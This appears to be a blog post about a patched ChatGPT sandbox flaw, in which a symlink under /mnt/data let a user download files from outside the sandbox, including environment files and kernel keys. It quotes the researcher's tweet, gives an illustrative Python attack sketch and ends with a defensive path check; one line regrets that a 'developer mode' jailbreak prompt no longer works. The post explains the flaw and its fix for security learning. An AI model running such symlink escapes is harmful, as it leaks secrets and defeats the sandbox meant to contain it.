There was an exploit in ChatGPT that allowed a user to create symlinks in the Linux filesystem the sandbox runs on and then download data from outside the sandbox in a zip file. It has since been patched, but it is a cautionary tale: this allowed stealing data from the machine. It is why an LLM deployment needs to be designed very carefully, and why all user input must be filtered, because it cannot be trusted. ChatGPT uses Kubernetes to handle the container the OpenAI system runs in, which sits under the /home/sandbox/.openai_internal folder, and I think the image is Debian-based as well. To OpenAI's credit, a user on Twitter reported the bug and it was fixed very quickly, but it is still an interesting development.
Here is the Twitter post.
That was fun. I bypassed a @OpenAI ChatGPT /mnt/data restriction via a symlink, downloaded envs, Jupyter kernels' keys, and some source code from there. Reported via @Bugcrowd and got not applicable! Now this issue is fixed (in like an hours after my report).. Is it how it… pic.twitter.com/TfMoUJYKUb
— Ivan at Wallarm / API security solution (@d0znpp) November 14, 2023
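To make the mechanism concrete, here is a minimal sketch in Python of what such an attack could look like from inside the sandbox. The researcher did not publish his exact payload, so the paths and steps below are illustrative assumptions rather than his actual code:

```python
import os
import zipfile

# Illustrative sketch only; the exact payload was never published.
# The idea: /mnt/data is the directory exposed for file downloads, but a
# symlink placed inside it can point anywhere in the container's filesystem.
target = "/home/sandbox/.openai_internal"   # internal directory mentioned above
link = "/mnt/data/internal_link"

# Plant the symlink inside the "allowed" download directory.
os.symlink(target, link)

# Walk through the link and pack whatever it exposes into a zip archive.
# os.walk follows the link because we hand it the link path directly.
with zipfile.ZipFile("/mnt/data/leak.zip", "w", zipfile.ZIP_DEFLATED) as zf:
    for root, _dirs, files in os.walk(link):
        for name in files:
            path = os.path.join(root, name)
            zf.write(path, arcname=os.path.relpath(path, link))

# Asking ChatGPT for a download link to /mnt/data/leak.zip would then hand
# the user an archive of files from outside the sandboxed data directory.
```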
Attempting to use the ChatGPT bot as a personal computer and generate files to download is against the terms and conditions, but this episode just underlines that security is very important: user input cannot be trusted at all and must be sanitized to maintain security. It is just a pity the developer mode prompt does not work anymore.
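On the defensive side, a common way to close this kind of hole (I do not know exactly what fix OpenAI shipped, so this is only an assumption) is to resolve symlinks server-side before serving any file, so a link planted under /mnt/data cannot smuggle out files that really live elsewhere:

```python
import os

ALLOWED_ROOT = os.path.realpath("/mnt/data")

def is_safe_download(path: str) -> bool:
    """Hypothetical server-side check: resolve symlinks before trusting a path."""
    # realpath() follows every symlink, so a link under /mnt/data that points
    # at /home/sandbox/.openai_internal resolves to its real location and
    # fails the prefix test below.
    real = os.path.realpath(path)
    return real == ALLOWED_ROOT or real.startswith(ALLOWED_ROOT + os.sep)

# A symlinked path is rejected even though it "lives" under /mnt/data:
# is_safe_download("/mnt/data/internal_link/config.json")  ->  False
```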